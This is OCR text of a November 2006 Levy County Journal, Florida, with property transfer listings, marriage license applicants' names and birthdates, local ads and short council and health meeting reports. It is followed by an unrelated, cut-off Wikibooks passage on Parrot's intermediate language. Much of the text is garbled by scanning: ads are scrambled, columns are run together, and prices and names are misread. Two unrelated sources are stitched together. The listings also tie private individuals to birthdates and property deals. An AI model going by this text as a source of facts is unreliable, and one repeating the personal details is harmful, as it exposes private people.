1-12-14, PARCEL #00870-014-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): GOLDING MARY R E, $1.00, BDYN1/2 N1/216-11-14, PARCEL #00633-001-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): CLYATT LAND TRUST, CLYATT MONT E, $1.00, BDYNE1/4 SW1/422-14-16, PARCEL #026621-001-00 Grantee(s): CENTRAL FLORIDA ELECTRIC COOPERATIVE INC Grantor(s): LIMBAUCH KATHRYN L, LIMBAUCH STANTON, LIMBAUCH STANTON D WD, $115,000.00, L18(17) AF KNOTTS LAND COMPANY Grantee(s): SCARPATI JENNIFER S, SCARPATI ANTHONY V Grantor(s): FISCHER ELEANOR, FISCHER FRANCIS M, $75,000.00, L18(17) AF KNOTTS LAND COMPANY Grantee(s): EQUITY MORTGAGE GROUP INC Grantor(s): SCARPATI JENNIFER S, SCARPATI ANTHONY V QCD, $10.00, L5(J) FOX GROVE FARMS SD Grantee(s): LAING YVONNE D FOSTER Grantor(s): SUMM INVESTMENT INC M, $52,400.00, L5(J) FOX GROVE FARMS SD Grantee(s): PERTNOY JOSHUA Grantor(s): LAING YVONNE D FOSTER WD, $4,500.00, L8(14) WILLISTONHGH#14 Grantee(s): WIX KIM J, WIX JAMES Grantor(s): LAKE PROPERTY INVESTMENT GROUP OF NORTH FLOR- IDA ' M, $15,000.00, L5(5) WOODPECKER RIDGE Grantee(s): PERKINS STATE BANK Grantor(s): WHITTLE SYLVIA I, WHITTLE GERALD L QCD, $10.00, L24(6) OAK RIDGE ESTS, WIMH Grantee(s): RUVIO DAVID L III Grantor(s): RUVIO DAVID L M, $55,000.00, BDYNE1/4 NE1/46-12-18, PARCEL #03998-014-00, ETC Grantee(s): NAVY FEDERAL CREDIT UNION Grantor(s): GOSEIN ASTRID E, GOSEIN DOMINIC WD, $6,000.00, L16-17(20) RAINBOW LAKES ESTS SECTION Grantee(s): LAND TRUST NO5, CLARK RICHARD TRUSTEE Grantor(s): WORLEY DENISE D WD, $6,000.00, L16-17(20) RAINBOW LAKES ESTS SECTION Grantee(s): CLARK RICHARD TRUSTEE, LAND TRUST NO5 Grantor(s): AKIN CLARA QCD, $6,000.00, L16-17(20) RAINBOW LAKES ESTS SECTION Grantee(s): CLARK RICHARD TRUSTEE, LAND TRUST NO5 Grantor(s): MARTIN CAROL AAD, $10.00, OR 681/32, 712/348, L10, 12 FANNING SPRINGS WOOD- ED ESTS Grantee(s): HENDRICKS LUCY J Grantor(s): CHARLES B HENDRICKS REVOCABLE LIVING TRUST, DA- VID MOWREY CONSTRUCTION, HENDRICKS CHARLES B TRUST, HEN- DRICKS PATRICIA L QCD, $10.00, BDY SE1/4 SE1/4 2-12-14, PARCEL #00545-000-00, ETC Grantee(s): STALVEY MARY JANE, STALVEY WILLIAM H Grantor(s): HOOKER BARBARA F, HOOKER DEAN WD, $44,995.00, BDY L18(14) RAINBOW LAKES ESTS SEC N, ETC Grantee(s): MOYA GERARDO Grantor(s): AMERICAN PRIME LLC M, $37,051.35 BDY L18(14) RAINBOW LAKES ESTS SEC N, ETC Grantee(s): BANK OF AMERICA NA Grantor(s): MOYA GERARDO More on page 19 LEVY COUNTY JOURNAL AROUND THE COURTHOUSE THURSDAY, NOVEMBER 16, 2006 Page 19 Land Transactions M, $4,499.00, BDY L18(14) RAINBOW LAKES ESTS SEC N, ETC Grantee(s): AMERICAN PRIME LLC Grantor(s): MOYA GERARDO D, $10.00, BDY SE1/4 SW 1/4 3-12-17, PARCEL #03278-128-00, & 03278-088-00 Grantee(s): (ALONSO MOLINA CYNTHIA M, MOLINA CYNTHIA M ALONSO, RANIERI CARMEN Grantor(s): ALONSO BELQUIS ESTATE, MOLINA CYNTHIA M ALONSO, ALONSO MOLINA CYNTHIA M M, $110,000.00, L120 FOREST PARK UNIT 3 PHASE II Grantee(s): CAPITAL CITY BANK, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): DZIEKAN MARY L WD, $200,000.00, L4(58) UNIVERSITY OAKS Grantee(s): BLOODWORTH SHANNON D, BLOODWORTH TIMOTHY M Grantor(s): STEVE SMITH CONSTRUCTION INC M, $204,300.00, L4(58) UNIVERSITY OAKS Grantee(s): JP MORGAN CHASE BANK NA Grantor(s): (s) BLOODWORTH SHANNON D, BLOODWORTH TIMOTHY M- M, $27,871.64 L87(7) FANNING SPRINGS ANNEX, W/MH Grantee(s): CAPITAL CITY BANK Grantor(s): SCOTT WILLIAM, GRAMS WILLIAM SCOTT M, $38,849.39 L6(19) JB EPPERSON ADD TO WILLISTON Grantee(s): HOUSEHOLD FINANCE CORPORATION III Grantor(s): EDWARDS LAQUWANDA, EDWARDS LAJESKI, BROWN LAQUWANDA M, $79,088.42 BDYNE1/4 SW1/49-13-19, PARCEL #05157-000-00 Grantee(s): HOUSEHOLD FINANCE CORPORATION III Grantor(s): ZAMORAAMIER, ZAMORA FELIX R WD, $85,000.00, L1-3(6) SUWANNEE RIVER HTS Grantee(s): HUDSON TONYA Grantor(s): COX H FRANK TRUSTEE, COX SHELLEY A TRUSTEE, H FRANK COX TRUST M, $72,649.00, L1-3(6) SUWANNEE RIVER HTS Grantee(s): AMERICAS WHOLESALE LENDER, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): HUDSON TONYA M, $13,500.00, L1-3(6) SUWANNEE RIVER HTS Grantee(s): LEVY COUNTY Grantor(s): HUDSON TONYA WD, $5,000.00, L32(30) OAKDALE HTS Grantee(s): KHUU LINH, PHAM LINH Grantor(s): FINANCEALL LLC AD, $42,000.00, LAM-1 GLEASONS TRAILER VILLAGE, W/MH Grantee(s): CARRANZAGILMA Y Grantor(s): DAILEY LAUREN J, DAILEY ROBERT L M, $8,500.00, L 13(13) BRONSON HTS SD Grantee(s): CAPITAL CITY BANK Grantor(s): (s) MCCHESNEY LAURA, ULLERY DIANNA M, $73,044.83 L29 FOREST PARL UNIT 2 Grantee(s): WELLS FARGO FINANCIAL SYSTEM FLORIDA INC Grantor(s): ROSA BENJAMIN, MILLER DONNA F WD, $194,000.00, L15(54) UNIVERSITY OAKS Grantee(s): HAYNES ROBERT T JR Grantor(s): VAN PELT MARGARET B, VAN PELT RONALD P M, $144,000.00, L15(54) UNIVERSITY OAKS Grantee(s): PROVIDENT FUNDING GROUP INC, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC, PFG LOANS INC Grantor(s): HAYNES ROBERT T JR MMA, $25,000.00, DOCUMENT #452299, BDY N1/224-12-13 Grantee(s): BANK OF AMERICA NA Grantor(s): SIKES JODI L, SIKES CLAUDE E M, $74,836.32 BDY 22-12-14, PARCEL #01039-000-00 Grantee(s): WACHOVIA BANK NATIONAL ASSOCIATION Grantor(s): LEGGETT ESTHER M, LEGGETT HENRY L WD, $8,000.00, L30(12) OAKDALE HTS Grantee(s): LANDBANK LLC Grantor(s): ROBERSON JOANNA S, ROBERSON SCOTT S QCD, $10.00, L1, 9(4) CEDAR HAVEN ESTS Grantee(s): BELCHER PEARL R, BELCHER PEARLE R Grantor(s): BELCHER JESSE ALLEN QCD, $10.00, L23(1) CEDAR HAVEN ESTS Grantee(s): BELCHER PEARL R, BELCHER PEARLE R, Grantor(s): BELCHER JESSE ALLEN, BELCHER PEARL R, BELCHER PEARLER AAA, $376,321.93 OR 740/919 Grantee(s): CAPITAL CITY BANK Grantor(s): WARE OIL & SUPPLY COMPANY INC WD, $260,000.00, L30 MANATEE WOODLANDS, BDY 31-11-14 Grantee(s): STOUT CATHLEEN, STOUT DAN Grantor(s): HOPE DOUGLAS 0 M, $182,000.00, L30 MANATEE WOODLANDS, BDY 31-11-14 Grantee(s): TREASURE COAST HOME TEAM FINANCING CORP Grantor(s): STOUT CATHLEEN, STOUT DAN M, $75,000.00, L30 MANATEE WOODLANDS, BDY 31-11-14 Grantee(s):' HOPE DOUGLAS Grantor(s): STOUT DAN, STOUT CATHLEEN WD, $85,000.00, L11 RAINBOW HTS SD PHASE 1 Grantee(s): MCHENRY JAMES ROBERT, MCHENRY ANA MARIA Grantor(s): GARCIA ANA MARIA, MCHENRY ANA MARIA, MCHENRY SHINE will help with Medicare questions SHINE (Serving Health Insurance Needs S bottles or a list of your drugs with dosages and the quantities you take daily.to any of-the following sites: Levy Counjty Bronson Library 600 Gilbert St.: Saturday, Nov. 18 1-3 p.m. Wednesday, Dec. 6 1:30-4 p.m. Chiefland Senior Center 305 SW 1st St.: Wednesday, Nov. 29 9 a.m.-noon Wednesday, Dec. 13 9 a.m.-noon Williston Library 10 SE 1" St.: Saturday, Nov. 18 10 a.m.-noon Wednesday, Dec. 6 9 a.m.-noon Yankeetown Library 11 56t to you. You can receive assistance by phone. i t -il ,A -"" A Ic | I Plan in 2006, go through the 'View Your Current Plan' tool in the box on the right side of the screen. This allows you to compare your current plan in 2007. You may be eligible for extra help in paying for the plan premium, deductible and drugs without penalty. You must meet the following, criteria to qualify: Single Income is $14,700 or less; assets total $11,500 or less Couple Income is $19,800 or less; assets total $23,000 or less Assets do not count your home or your vehicles. They do count your cash in the bank, CDs, stocks, bonds, cash value on your life insurance or burial policies, and any additional property. Ask. , hie e"J3et 'amce" t' f '/ew atit & awnitu kome on by and Browse Local Artists' Gallery of Equine, Western ad Landscape Art " Antique Consignmen NMONTANA URNI fues.-Sat. 1lam-5pm . ^ behind iAixie' at 40 hW 16t St. in WiUitw LUNCH: MONDAY-SATURDAY 11 AM-230 PM DINNER: MONDAY-THURSDAY 5 PM-9 PM FRIDAY & SATURDAY 5 PM-10 PM Private Di~din Rowom for Specdal OccasIo.s Beer awd Wine Ta4e-Osd awd Catering Servie AvawadO Now serving Pizza and auzones ow.TV Room is open so com wsatcA teo (Gam wA usl Holiday Specials Coming Soon 115 N.W. First Street Trenton, Florida 352-463-8494 JAMES ROBERT WD, $10.00, L6 RAINBOW HTS SD PHASE 1 Grantee(s): MCHENRY ANA MARIA, MCHENRY JAMES ROBERT Grantor(s): MCHENRY JAMES ROBERT CD, $10.00, OR 420/113, L7(62) WILLISTON HGH G&CC ESTS Grantee(s): COLLAZOS ADELAIDA, BOTERO CARLOS A Grantor(s): WILLISTON GOLF AND COUNTRY CLUB CORPORATION WD, $20,500.00, L7(62) WILLISTON HGH G&CC ESTS Grantee(s): COLLAZOS ADELAIDA, BOTERO CARLOS A Grantor(s): MCCURDY DALE, MCCURDY WILLIAM W, MCCURDY CHAR- LOTTE D CD, $10.00, L25(36) OAK RIDGE.ESTS Grantee(s):) DE JESUS JENNIFER, DE JESUS RAMON L, DEJESUS JENNIFER, DEJESUS RAMON L Grantor(s): MATOS MARIA, MATOS LUIS CT, $100.00, 38-06-CC-187, L20(5) FANNING SPRINGS ANNEX, W/MH Grantee(s): RANDOLPH JOHN, RANDOLPH PAULA. Grantor(s): CLERK OF COURT DANNY J SHIPP, ELLIOTT MARILYN, TREST LEONARD EDWARD III, TREST MARILYN WD, $73,400.00, BDYNE1/4 NE1/4 3-12-17, W/MH Grantee(s): WATERS MARJORIE A Grantor(s): RICHARDSON PENNY M, $72,824.00, BDY NE1/4 NE1/4 3-12-17, W/MH Grantee(s): COUNTRYWIDE HOME LOANS INC, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): WATERS MARJORIE A M, $90,000.00, L4(3) PLEASANT ACRES, BDY 34-16-17 Grantee(s): BRANCH BANKING AND TRUST COMPANY Grantor(s): SPRUILL ROY, SPRUILL DONNA M, $134,000.00, BDY SE1/4 SW1/4 29-11-17 Grantee(s): HARBOR FEDERAL SAVINGS BANK Grantor(s): BLANCO AMPARO, BLANCO GUSTAVO WD, $1,000.00, L24(2) FANNING SPRINGS ANNEX Grantee(s): OCONNOR WILL, COLLINS JEFFREY L Grantor(s): COLLINS JEFFREY L WD, $1,000.00, L8-10(2)SUWANNEE RIVER HGH Grantee(s): OCONNOR WILL, COLLINS JEFFREY L Grantor(s): COLLINS JEFFREY L WD, $1,000.00, L23(2) FANNING SPRINGS ANNEX Grantee(s):) OCONNOR WILL, COLLINS JEFFREY L Grantor(s): COLLINS JEFFREY L M, $28,180.06 L68(10) FANNING SPRINGS ANNEX Grantee(s): BENEFICIAL FLORIDA INC Grantor(s): VOWLES PATRICIA M, VOWLES LARRY S M, $13,265.15 L7(3) WILLISTON HGH SD #14 Grantee(s): HOUSEHOLD FINANCE CORPORATION III Grantor(s): MCCOY ALICE E, MCCOY RICHARD V Couples apply for marriage licenses Bernard Lewis Wallace, TanyaLynnPresley, 12/18/84 10/28/66, and DeeAnn of Archer LeilaniAkina, 1/14/77, both Jesse Bryan Lambert of Williston 7/28/82, of Floral City RayAnthony Polk, 2/5/68, and Amber Lynn Martin and Toni Lee Pitts, 11/22/61, 10/31/86, of Inglis. both of Archer. William Earl Couey Gary Dale Ridgeway, 4/12/85 of Chiefland, anc 9/11/69, and Deanna Amanda Lynn Lamb, 7/485 Chenille Wasner, 11/2/63, of Trenton. both of Chiefland. ChristopherAngeloNieves Ryan Mark Anders, 11/23/86, of Morriston, anc 9/11/80, of Leesburg, and Jessica Lynn Huggins, 7/1/88 Joy Leazeneth Harding, ofWilliston. 6/15/85, ofWilliston. Richard Gregory Smith Curtis Dale StacyvlJ-r:c. .2/14/76,,and.. Joanna,. Lyr 4/9/85, of Bronson, and Tedin, 9/10/82, both o SChiefland. Lunch Menui kihCardn n nndSal French Fries Buttered Corn Chilled Mix Fruit Asst. Milk Tuesday, Nov. 21 Spaghetti w/Meat Sauce "Care for the Entire Family" Garden Salad Green beans Chilled Peaches Homemade Rolls Asst. Milk/ Friday 9a.m.- Noon &2 p.m.-6 p.m. Tuesday 8 a.m.-12:30 p.m. Thursday 8 a.m.- Noon& 2p.m.- 5p.m. ~ Walk-Ins Welcome - N S4 =Sn , US 9 P THlHK BEFORE yOU STRIKE. S.5 5. ... PhI ~. ........... Fill Dirt & Hauling Located On South 21I-Williston, Florida (352) 528-3520 Office @ B&G Seed Other Contacts (352) 339-4713, (352) 339-2704 or (352) 339-6435 (oader operator) Page 20 LEVY COUNTY JOURNAL THURSDAY, NOVEMBER 16, 2006 Be responsible with your pets especially during the holidays BY LINDA KEARCE SPECIAL TO THE JOURNAL Sometimes we think that giving our pet food, shelter and love is enough. As responsible pet owners, we must also protect our pets from the hidden dangers that come along with this time of year. Pets are highly sensitive to smells, which may bring them into the kitchen where all the cooking is happening. Be especially sensitive to Fido or Fluffy, as they might get underfoot, when "Tom Turkey" is coming out of the oven. Hot drippings or other hot spills could cause scalding or burns to your pet. DON'T FEED pets cooled drippings. The added spices and rich stock can easily upset your pet's digestive system. BONES ARE DANGEROUS! Poultry bones splinter- easily each year causing thousands of pets pain and sometimes death. Increased activity and visitors around the home can upset your pet's routine. Try to keep your pet on a regular feeding and exercise schedule. Try to resist the temptation of dressing up your pet with ribbons around their necks. The ribbons can tighten if caught on something and can result in choking. Linda Kearce works with Trenton Animal Hospital in Trenton. [] I[] i[]t In tii i[] I 'lB i .l] lBn [1 i[] i[lKhil[ i[] liB K]: Bi SBeautiful 4 BR/2.5 BA house in Williston S at 21350 NE 40th Ave., 1,630 sq. ft. with L carport & bonus room on large corner lot. It is S2 miles east of City Hall on C.R. 318. Listed for , B $125,000, thousands under appraisal! SHIP I down payment assistance for moderate E income families on this house is $15,600. Call l Florida U.S.A. Realty, Inc. 352-378-3783. 1hkhoseke itora es'rngdntcaidbeauwte The construction consists of 2x6 exterior walls, and includes a water system, alarm system. stainless steel dishwasher, stainless steel kitchen sink and a stainless steel double sink in the laundry room' It has large pantry and laundry room with wood cabinets, separate ice maker machinein bar area, oversized garage at 814 sq ft. with a Sworkbench. pumphouse! Some k -, 5 a furniture will remain in the home. & All of this is in the Buck Bay subdivision! $275,000 Brand new construction! Custom built home n golf course community. 30 year architectural shingles, wood floors in kitchen and entry, 36 inch kitchen cabinets, stainless steel appliance package. Short drive to Manatee Springs State Park Chiefland Golf and Country Club. shopping I ispe dl medical, and schools. A must see! $219,000 -. Regina Goss Licensed Real Estate Broker GOs LLIA MOBILE HOMES: REAL ESTATE, INC. Whitted Mobile Home Estates 3/2 DWMH on 2 lots, screened porch; detached carport & more. Owner fin- ancing to qualified buyer! -$69;00- Reduced! $62,500. Hideaway Adult Park 2 BR, 2 Bath, DWMH on land- scaped lot. Carport, storage & screen porch additions. Includes private well. $84R8 Reduced! $76. $41-3;-0, Reduced: $105,000 8.9 Acres -just off U.S. Alt. 27. $4Qe2-600tReduced: '$110,000 5 Wooded Acres Gilchrist County, some pecan trees. $85hO 0 Reduced to $76,500! 100 Acres Williston area, pines, oaks, holly & more, small ponds. $-19;00 per acre. Reduced to $15,000 per acre. Motivated seller. Corner Parcel 80 Ac at corner of 2 paved roads, planted pines. $15,000 per acre 80 Acres 1/4 mile paved road frontage, large oaks. $212-600:-$1-5-500. Reduced! $13,000 2nd one:$4&;86e Reduced! $12,500 10-Acre Tracts 4 to choose from. Great location close to Golf Course. Priced $125,000 to $139,000. HOMES: Waterfront- 1.5 Acres w/ 390' on canal 3/2 home par- tially furnished. Immaculate. $285,000. Details and photos at. com 102 S. Main Street, Chiefland, FL 32626 Office: 352-493-2838 Evenings: 352-493-1380 L ` '-' S ARE YOU A N SERIOUS SELLER? IF YOU OWN REAL ESTATE & WANT MAXIMIZED VALUE CONTACT YOUR CURRENT QUIC L REAL ESTATE AGENT OR ANY OF THE REAL ESTATE PROFESSIONALS LISTED BELOW WHO CAN EXPLAIN THE BENEFITS OF HAVING YOUR PROPERTY INCLUDED IN THE UPCOMING.... ..... .. ....... r* k* ** GREAT ** * - A RTH CENLTRALORIDA .. AR ESTATE AUCTION!!! *HAVE YOUR PROPERTY EXPOSED TO MILLIONS OF PEOPLE IN THE EASTERN UNITED STATES & INTERNATIONALLY *READY AND WILLING & ABLE TO BUY *PRE-APPROVED FINANCING FOR BUYERS ALL TYPES OF PROPERTY *NO SALES COMMISSION *NO CLOSING COSTS *NOMINAL LISTING FEE $1,000 TO $4,000 HOUSES CONDOS HOMESITES ACREAGE TRACTS WATERFRONT COMMERCIAL BEN CAMPEN AUCTIONEERS I iesdRa l Esa teBrke -B #1901-AU#21 -AB#218 IJR To list your home or property, call Laura at 486-2312. We have prices to fit every budget. .A I LEVY COUNTY JOURNAL AROUND LEVY COUNTY THURSDAY, NOVEMBER 16, 2006. Pge 21 Workshops will inform you on agribusiness Agritourism and nature tourism can take many forms. Examples include roadside stands, fahners' markets, overnight farm stays, ag tours, bed and breakfasts, hunting, U-Pick operations, pumpkin patches, nature based operations, aquaculture tours, Christmas tree farms, corn mazes, farm animal petting zoos and wine tasting. These attractions can bring profits never realized through the traditional farm and ranch operations of growing and selling food and fiber. The Original Florida Task Force, University of Florida, Suwannee River Valley, and VISIT FLORIDA Share sponsoring a series of educational workshops that Swill help farm and land : owners, and aquaculture : businesses create or '- : i,. ' a, /. is s .:: ,^^ B~ ~ ^ strengthen tourism businesses to supplement their ongoing farm operations. For workshop information or comments please contact Linda Landrum at 386-362- 1725, ext. 105. Three Workshops: Workshop #1, Topic: Overview of Agritourism and Ecotourism Opportunities Dec. 6 9 a.m.-3 p.m. at Stephen Foster Folk Cultural Center, White Springs. Workshop #2, The Nut and Bolts of Starting an Agritourism or Ecotourism Business Jan. 9, 2007 9 a.m.-3 p.m., Camp Weed, Live Oak. Workshop #3: Show Me The Money and Put it All Together. Feb. 7, 2007, 9 a.m.-3 p.m., Spirit of the Suwannee Music Park, Live Oak. These workshops are $10 per person and include lunch. By completing all three workshops agri/eco-tourism providers are eligible to be included in Original Florida's forthcoming marketing an promotion opportunities for the region. SponsoredbytheUniversity of Florida IFAS North Florida Research and Education Center-Suwannee Valley. org and VISIT FLORIDA. The Levy County Visitor's Bureau hopes there are businesses in Levy County who are looking for ways to improve their business or start a new one. These workshops will provide insight and new ways to develop additional income for agritourism and ecotourism businesses. LAND CLEARING DRIVEWAYS, PONDS, RADINFRE ETIMTE TRACTOR WORK, ROK & DIRT... Call: (352) 406-1117 l: Bronson Library to host poporn and movie S: Bronson Public Library will host popcorn and a movie Nov. 27-at 4p.m. The. feature film.will be The Saga of Lightning Mc- IQueen, a hot-shot animated stock-car voiced by actor r Owen Wilson. In route to a big race, the cocky McQueen . .gets waylaid in Radiator Springs, where he finds the true meaningg of friendship and family. !:! The film is rated G and runs 116 minutes. ' Contact the library 486-2015 or Jenny Rodgers Youth servicess Coordinator 486-5552 for more information on Ithbese exciting events. 0 I TMM I I I I Low Rates Easy Terms Personal & Commercial Auto Insurance Home* Life* Commercial Rapid Tax Returns "Guaranteed Lowest Down Payment" Z~~&~$zdY: -F~~_j~iS*; -.j UL Find your dream home in r. 14 t. <; c, I~ TURN THIS... ,.. INTO THIS! Find your dream home in the Marketplace! 4BR .p NEW US11NGI -- Beautiful .36 Acres Lot off of Hwy 27 in Bronson Heights Area! 4 BR/2.5 BA$392,000 Priced to Sell! $22,000 Natalie 219-8365 MLS#753746 Natalie 219-8365 MLS#754449 NEW CONSTRUCTION! To See Your Home on Give Us a Call NEW USTINGI Nice.24 Acres Lot in Bronson. Great for your Mobile Home or Site Built Home! Priced to SELU$20,000 Natalie 219-8365 MLS#754443 3 BR/2 BA $149,900 4BR/2 BA $191,900 Tom 317-27A7A MI CLt 7A5435 Tom 31.7-9476 MI Sf#754:3 Block 3 BR/2BA Home $229,000 Noemi 316-5644 MLS# 754076 OPEN HOUSE SUNDAY 1:00-3:00PM 501 N.Court St., Bronson Call Noemi for details 316-5644 Refrshments willbe served LY COUNTY JOUR L C4 JUNTY PAPER EST. 192 Call Laura to list your house in the Marketplace. 352-486-2312 V~ Page 22 LEVY COUNTY JOURNAL THURSDAY, NOVEMBER 16, 2006 IHousing SMHousingContinuedfrom front to allow for greater density development so the Roswell complex plans can move forward. Debra Jones' motion to approve the first reading of the proposed ordinance received unanimous approval after be- ing seconded by Jerry Robinson. Council will hear the second reading of the ordinance Nov. 21. The developer is trying to acquire additional acreage at this time, according to Garcia. Nature Coast Business Development Council executive di- rector Pam Blair updated council members on the enterprise zone development strategic plan. Blair will present the plan to the board of county commissioners Nov. 21 and will then sub- mit it to the state. "We definitely have the attention from the state," Blair told council. A decision is expected from the state before January 1. If the plan is approved, the county can offer inducements to potential businesses locating within specified zones. Levy County Health Department employee Slande Celeste spoke before council, seeking to enlighten council members about the health issues facing residents, and to gain participa- tion in an ongoing group involved in improving the health of area residents. Celeste runs the group RICH, or Reaching to Improve Community Health, a consortium of individuals and organizations that strives to increase health awareness and forge partnerships between groups working to create a healthier populace. RICH meetings are held at 9 a.m. the sec- ond Tuesday of each month at the Levy County Health De- partment in Bronson. MSchool Continued from front Administrative superintendent JeffDavis said various con- struction projects were moving along. Board member Paige Brookins moved and Mrs. Shuster seconded approval of a blue roof for Chiefland Middle School's gymnasium roof. The board also set an executive session to discuss ongoing litigation with Juanita Terrell. A closed session will be held Nov. 21 to discuss the lawsuit. Journal photo by Cassie Journigan FATHER AND SON Bill and Joshua Allen share a hard day of fishing at Fanning Springs. Said Dad, "It's just not a good day for fishing. Wrong day, wrong place, orwrong time." Rejoined son, "Not one has bit since morning." Still, with the sun, the warmth, the scenic beauty, neither was frowning. Rural health takes front and center at Bronson meeting BY CASSIE JOURNIGAN STAFF WRITER Cardiovascular disease is high on the list of health problems confronting Levy County residents. Combine that with poverty, smoking, obesity and lack of access to health care and you have a picture of common causes of death faced by area resi- dents. Health Department rep- resentative Slande Celeste spoke to Bronson's town council Nov. 6, seeking to both enlightencouncil mem- bers about the health issues facing residents, and to gain council participation in an ongoing group involved in improving the health of area residents. "Rural counties have a poorer health sta- tus than larger counties. We shouldn't settle for a poor health status," Celeste said. The health department hosts a committee that aims to bring a better health out- look to area residents. RICH, or Reaching to Improve Com- munity Health, is a group of individuals and organiza- tions that strives to increase health awareness and forge partnerships between groups working to create a healthier populace. "The purpose of the group," Celeste said, "is to get everyone who is inter- ested involved in working for better community health.. "Levy County overall has a high poverty rate and limited access to health care. Bron- son's health department has two providers and an over- whelmed caseload," Celeste said. She added they are cur- rently unable to take on new cases due to a lack of money and space. "We are hoping to increase awareness, and by offering prevention pro- grams, to give people alterna- tives," she said. RICH meetings are held at 9:00 a.m. the second Tuesday of each month at the Levy County Health Department in Bronson. Both the public and local government leaders are invited to attend. For more information call Celeste at 493-6774. Little Women held over SPolice Little Women; a production of the Suwannee Valley Players will be held over one additional weekend Nov. 17-19. Shows on Fridays through Saturdays begin at 8 pm and on .ntiedfrom front Sundays at 2:30 pm. Ticket prices are $8 for adults and $6 for students with ID. For more information, log onto www. svplayers.com. Journal pnoto Dy cassie Journigan COMMISSIONERS RECOGNIZED RECREATION committee members who worked on the renovation of Buie Park. Pictured are Rollin Hudson, Blake Davis, Shane Keene, Wayne Weatherford, Buie family mem- ber Edith J. Williams, Jennifer Willis, Alice Monyei, Teal Pomeroy and Teresa Barron. Members honored but not present include Dorothy Scott and Myron Watson. department, should be do- ing." The ordinance will be ta- bled until the Nov. 27 meet- ing. Chiefland commissioners read a resolution officially renaming a city street in hon- or of resident Eddie Buie at Monday's city commission meeting. Noting Buie's de- votion to his community, the resolution sets aside South- west 5t Street, from South- west 4h Avenue to the city boundary as Buie Park Road. The city will now forward the proclamation to the county and request their reciprocal action. Albert Karsky presented his water bill and asked com- missioners to reconsider the amount charged. He was charged approxi- mately $1,680 for 607,000 gallons of water. The figures, which showed up in his Octo-. ber bill, reflected a slow leak. Since several times during the past six months, his meter was either not read or registered incorrectly at zero. Tthe city manager has agreed to look into the prob- lem. Commissioners will de- cide how to administer the bill at the next council meet- ing. FANNING SPRINGS FESTIVAL OF LIGHTS 18thAnnual FANNING SPRINGS STATE PARK, FANNING SPRINGS, FLORI)A DECEMBER 9,2006 EVENTS INCLUDE: Arts, CraftsAmusement Rides, Christmas Boat Parade, Rubber Ducky Race, classic Car Show, Santa Claus, Good Food, Games, Motorcycle Showcase, Special Country & Gospel Music, Christmas Carols. Drawings for prizes donated by local merchants and much more. NAME ADDRESS TEL. FAX E-MAIL (Only so many 110V electric hookups available, apply early,.or provide own generator) DEAD LINE TO ENTER December 4, 2006 ARTS & CRAFTS ENTRY S35.00 TYPE Absolutely NO Commercial Arts & Crafts permitted No of Booths 15'X15'_ Need Electric? 110V only Yes No FOOD CONCESSION ENTRY S100.00 TYPE Need Electric? 110V only Yes No_ No of Booths 15'X15' Send picture, copies of Insurance & Permits & Menu BOAT PARADE ENTRY $20.00 Length of Boat Type 1st, 2nd & 3rd place winners in small, medium and large categories. Parade @ 6:30 PM I will provide my own insurance and other business needs. I and my associates will hold harmless the Fanning Springs Chamber of Commerce and Festival of Lights, and all those associated with it in any manner what-so-ever, including but not limited to, accidents & theft. I will abide by all Festival and State Park rules and regulations. No Knives, Guns & Ammo or Fire Works permitted. Signature Mail to: Fanning Springs Chamber of Commerce & Festival of Lights 17456 NW US Hwy 19, Fanning Springs, Fl 32693 (Send stamped envelope for confirmation). Sponsored by: Fanning Springs Greater Chamber of Commerce, Festival of Lights, Inc. Committee, City of Fanning Springs and Progress Energy Phone 352-463-9089 or 352-463-7919 for information Visit us @f www: fanningspringsllorida.com e-mail: fanningspringschamber@masn.com "COME CELEBRATE WITH US" Apply for HELP, the HOLIDAY EXPRESS LOAN PROGRAM*). IACKSON HEWIT' ITACKAX ERUICE Call 1-800-234-1040 or visit 102. N MAIN ST. CHIEFLAND 352-493-2855 OPEN NOW LOCATED IN CHIEFLAND RIGHT NEXT TO BELL'S FAMILY RESTAURANT. :u l IDo r -a l fT wO r' w(0 l A aril.'. ', ll o r0i..1 'il ,I l..1. .1 Iiu I j lq ,l C '1 ,r' I* of YearEnd Tax Pla(mn roquir d. Lon provided by HSBC Rnk USA. N.A or bfa Bira Bnarra OonR &Tu a oom PatlK Capitl Bank. NA loan m Ut s $6tM0 for pre approvd cusa & NtO0 Iotlll O rr erppOanlt Brank & don HeWlitt feesded td from lowM proeeds Availabl from 1 i 3wo5 t hlioo ) h1 a rtO poidpfing) iocatlorK Most ofircs are indeperdetpe ly ownedA wprat When They're Gone.. Lagau I uu! Contact Us | Permissions | Preferences | Technical Aspects | Statistics | Internal | Privacy Policy © 2004 - 2011 University of Florida George A. Smathers Libraries.All rights reserved. Acceptable Use, Copyright, and Disclaimer Statement Powered by SobekCM
http://ufdc.ufl.edu/UF00028309/00096
CC-MAIN-2016-50
refinedweb
32,933
72.26
Parrot Virtual Machine/Parrot Intermediate Representation Parrot Intermediate Representation[edit] The Parrot Intermediate Representation (PIR) is similar in many respects to the C programming language: It's higher-level than assembly language but it is still very close to the underlying machine. The benefit to using PIR is that it's easier to program in than PASM, but at the same time it exposes all of the low-level functionality of Parrot. PIR has two purposes in the world of Parrot. The first is to be used as a target for automatic code generators from high-level languages. Compilers for high-level languages emit PIR code, which can then be interpreted and executed. The second purpose is to be a low-level human-readable programming language in which basic components and Parrot libraries can be written. In practice, PASM exists only as a human-readable direct translation of Parrot's bytecode, and is rarely used to program by humans directly. PIR is used almost exclusively to write low-level software for Parrot. PIR Syntax[edit] PIR syntax is similar in many respects to older programming languages such as C or BASIC. In addition to PASM-like operations, there are control structures and arithmetic operations which simplify the syntax for human readers. All PASM is legal PIR code, PIR is almost little more then an overlay of fancy syntax over the raw PASM instructions. When available, you should always use PIR's syntax instead of PASM's for ease. Even though PIR has more features and better syntax then PASM, it is not itself a high-level language. PIR is still very low-level and is not really intended for use building large systems. There are many other tools available to language and application designers on Parrot that PIR only really needs to be used in a small subset of areas. Eventually, enough tools might be created that PIR is never needed to be used directly. PIR and High-Level Languages[edit] PIR is designed to help implement higher-level languages such as Perl, TCL, Python, Ruby, and PHP. As we've discussed before, high-level languages (HLL) are related to PIR in two possible ways: - We write a compiler for the 